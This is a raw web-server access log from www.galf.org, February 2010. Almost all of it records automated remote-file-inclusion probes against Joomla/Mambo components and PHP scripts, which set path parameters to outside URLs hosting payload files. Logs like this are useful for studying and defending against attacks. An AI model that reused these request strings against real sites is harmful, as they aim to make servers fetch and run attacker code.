65.55.106.162 - - [14/Feb/2010:23:55:30 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
58.230.162.220 - - [15/Feb/2010:00:00:53 -0800] "GET /logs/access_091228.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [15/Feb/2010:00:00:53 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [15/Feb/2010:00:00:53 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:00:01:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:00:01:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:32 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:34 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:35 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:36 -0800] "GET /logs/access_100118.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:37 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:37 -0800] "GET /logs/access_100118.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:38 -0800] "GET /logs/access_100118.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:38 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:39 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:39 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:02:40 -0800] "GET /logs/access_100118.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:03:02 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:03:02 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [15/Feb/2010:00:03:41 -0800] "GET /logs/access_090713.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [15/Feb/2010:00:03:45 -0800] "GET /logs/access_100111.log%20%20/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.172.236.41 - - [15/Feb/2010:00:03:56 -0800] "GET /logs/access_100111.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:00:04:07 -0800] "GET /logs/access_100125.log%20%20//admin.admin.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:00:04:07 -0800] "GET /admin.admin.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:00:04:07 -0800] "GET /logs//admin.admin.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.120 - - [15/Feb/2010:00:04:18 -0800] "GET /index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [15/Feb/2010:00:04:19 -0800] "GET /logs/access_090928.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
78.110.50.120 - - [15/Feb/2010:00:04:19 -0800] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
209.126.254.164 - - [15/Feb/2010:00:06:28 -0800] "GET /logs/access_091207.log/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.164 - - [15/Feb/2010:00:06:28 -0800] "GET /logs/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.126.254.164 - - [15/Feb/2010:00:06:29 -0800] "GET /write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:06:39 -0800] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:00:07:43 -0800] "GET /components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:00:07:43 -0800] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:08:22 -0800] "GET /logs/access.log%20%20/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:08:22 -0800] "GET /error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:00:08:22 -0800] "GET /logs/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:08:34 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:08:34 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:08:54 -0800] "GET /logs/access.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.40 - - [15/Feb/2010:00:09:01 -0800] "GET /labia23portugues/index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FreeprodTB)" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:01 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:01 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:21 -0800] "GET /logs/access.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:34 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:34 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:34 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:40 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:40 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.193.225.60 - - [15/Feb/2010:00:09:40 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [15/Feb/2010:00:11:07 -0800] "GET /logs/access.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:00:14:37 -0800] "GET /logs/access.log%20%20//admin.admin.html.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:00:14:42 -0800] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:00:14:42 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:00:14:42 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.galf.org"
195.186.64.181 - - [15/Feb/2010:00:15:10 -0800] "GET /delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
195.186.64.181 - - [15/Feb/2010:00:15:11 -0800] "GET /logs/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
195.186.64.181 - - [15/Feb/2010:00:15:11 -0800] "GET /logs/access.log/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
195.186.64.181 - - [15/Feb/2010:00:15:13 -0800] "GET /delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
195.186.64.181 - - [15/Feb/2010:00:15:13 -0800] "GET /logs/access.log/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
195.186.64.181 - - [15/Feb/2010:00:15:14 -0800] "GET /logs/delete_comment.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:15 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:16 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:16 -0800] "GET /logs/access_091221.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:16 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:16 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:16 -0800] "GET /logs/access_091221.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:20 -0800] "GET /logs/access_091221.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:20 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:20 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:38 -0800] "GET /logs/access_100111.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:40 -0800] "GET /logs/access_100111.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:44 -0800] "GET /logs/access_100111.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:48 -0800] "GET /logs/access_091109.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:48 -0800] "GET /logs/access_090921.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:49 -0800] "GET /logs/access_091012.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:49 -0800] "GET /logs/access.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:52 -0800] "GET /logs/access_091109.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:52 -0800] "GET /logs/access_100118.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:15:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:15:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:54 -0800] "GET /logs/access_091109.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:54 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:15:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:15:54 -0800] "GET /logs/access_090817.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:15:54 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:54 -0800] "GET /logs/access_090921.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:55 -0800] "GET /logs/access_091012.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:55 -0800] "GET /logs/access.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:55 -0800] "GET /logs/access_100118.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:56 -0800] "GET /logs/access_090921.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:57 -0800] "GET /logs/access.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:57 -0800] "GET /logs/access_091012.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:57 -0800] "GET /logs/access_100118.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:58 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:15:59 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:04 -0800] "GET /logs/access_090921.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:07 -0800] "GET /logs/access_090921.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:00:16:08 -0800] "GET /error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:00:16:08 -0800] "GET /logs/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [15/Feb/2010:00:16:09 -0800] "GET /logs/access.log%20%20/error.php?dir=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:09 -0800] "GET /logs/access_090921.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:12 -0800] "GET /logs/access_091012.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.36.1.51 - - [15/Feb/2010:00:16:12 -0800] "GET /logs/access_090817.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:14 -0800] "GET /logs/access_091012.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:15 -0800] "GET /logs/access_091005.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:00:16:15 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:00:16:15 -0800] "GET /logs/access_090713.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.12.11.202 - - [15/Feb/2010:00:16:15 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.tinituscure.com/health-articles/sun.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:15 -0800] "GET /logs/access_091026.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:18 -0800] "GET /logs/access_090817.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:18 -0800] "GET /logs/access_091130.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:18 -0800] "GET /logs/access_091012.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [15/Feb/2010:00:16:18 -0800] "GET /logs/access_091005.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
